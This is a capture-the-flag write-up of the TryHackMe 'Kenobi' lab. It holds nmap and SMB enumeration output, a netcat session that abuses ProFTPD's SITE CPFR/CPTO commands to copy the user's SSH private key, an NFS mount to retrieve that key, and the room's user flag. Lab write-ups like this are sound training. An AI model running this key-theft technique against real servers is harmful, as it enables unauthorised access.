#kenobi

#kenobi
enumerating samba for shares
Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often refereed to as a network file system.

Samba is based on the common client/server protocol of Server Message Block (SMB). SMB is developed only for Windows, without Samba, other computer platforms would be isolated from Windows machines, even if they were part of the same network.

nmap scan:
Scanning 10.10.12.118 [1000 ports]
Discovered open port 80/tcp on 10.10.12.118
Discovered open port 139/tcp on 10.10.12.118
Discovered open port 445/tcp on 10.10.12.118
Discovered open port 21/tcp on 10.10.12.118
Discovered open port 111/tcp on 10.10.12.118
Discovered open port 22/tcp on 10.10.12.118
Discovered open port 2049/tcp on 10.10.12.118
Increasing send delay for 10.10.12.118 from 0 to 5 due to 298 out of 991 dropped probes since last increase.
Completed SYN Stealth Scan at 11:53, 17.20s elapsed (1000 total ports)
Initiating Service scan at 11:53
Scanning 7 services on 10.10.12.118
Completed Service scan at 11:53, 11.67s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 10.10.12.118
Retrying OS detection (try #2) against 10.10.12.118
Retrying OS detection (try #3) against 10.10.12.118
Retrying OS detection (try #4) against 10.10.12.118
Retrying OS detection (try #5) against 10.10.12.118
Initiating Traceroute at 11:53
Completed Traceroute at 11:53, 0.24s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:53
Completed Parallel DNS resolution of 2 hosts. at 11:53, 0.04s elapsed
NSE: Script scanning 10.10.12.118.
Initiating NSE at 11:53
Completed NSE at 11:53, 7.15s elapsed                                                                                                                                                                        
Initiating NSE at 11:53                                                                                                                                                                                      
Completed NSE at 11:53, 1.02s elapsed                                                                                                                                                                        
Initiating NSE at 11:53                                                                                                                                                                                      
Completed NSE at 11:53, 0.00s elapsed                                                                                                                                                                        
Nmap scan report for 10.10.12.118                                                                                                                                                                            
Host is up (0.23s latency).                                                                                                                                                                                  
Not shown: 993 closed ports                                                                                                                                                                                  
PORT     STATE SERVICE     VERSION                                                                                                                                                                           
21/tcp   open  ftp         ProFTPD 1.3.5                                                                                                                                                                     
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)                                                                                                                      
| ssh-hostkey:                                                                                                                                                                                               
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)                                                                                                                                               
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)                                                                                                                                              
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)                                                                                                                                            
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                                                                                    
| http-methods:                                                                                                                                                                                              
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                                                                 
| http-robots.txt: 1 disallowed entry                                                                                                                                                                        
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      42339/tcp6  mountd
|   100005  1,2,3      46461/udp   mountd
|   100005  1,2,3      56239/tcp   mountd
|   100005  1,2,3      59287/udp6  mountd
|   100021  1,3,4      35464/udp6  nlockmgr
|   100021  1,3,4      40357/tcp6  nlockmgr
|   100021  1,3,4      41719/tcp   nlockmgr
|   100021  1,3,4      46338/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/16%OT=21%CT=1%CU=31075%PV=Y%DS=2%DC=T%G=Y%TM=5F89C2
OS:15%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 201.254 days (since Sun Mar 29 05:47:29 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2020-10-16T10:53:51-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-16T15:53:51
|_  start_date: N/A

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   242.51 ms 10.9.0.1
2   242.60 ms 10.10.12.118

NSE: Script Post-scanning.
Initiating NSE at 11:53
Completed NSE at 11:53, 0.00s elapsed
Initiating NSE at 11:53
Completed NSE at 11:53, 0.00s elapsed
Initiating NSE at 11:53
Completed NSE at 11:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.02 seconds
           Raw packets sent: 1516 (70.746KB) | Rcvd: 1143 (49.373KB)









for smb nmap scan:
command:nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.12.118
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.12.118\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.118\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.12.118\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)




enumerating rpcbind:
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.12.118




root@kali:~# nc 10.10.12.118 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.12.118]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful



now we are mounting /var directory
mount 10.10.12.118:/var /root/ctf/tryhackme/Kenobi/

user.txt:flag
d0b0f3f53b6caa532a83915e19224899


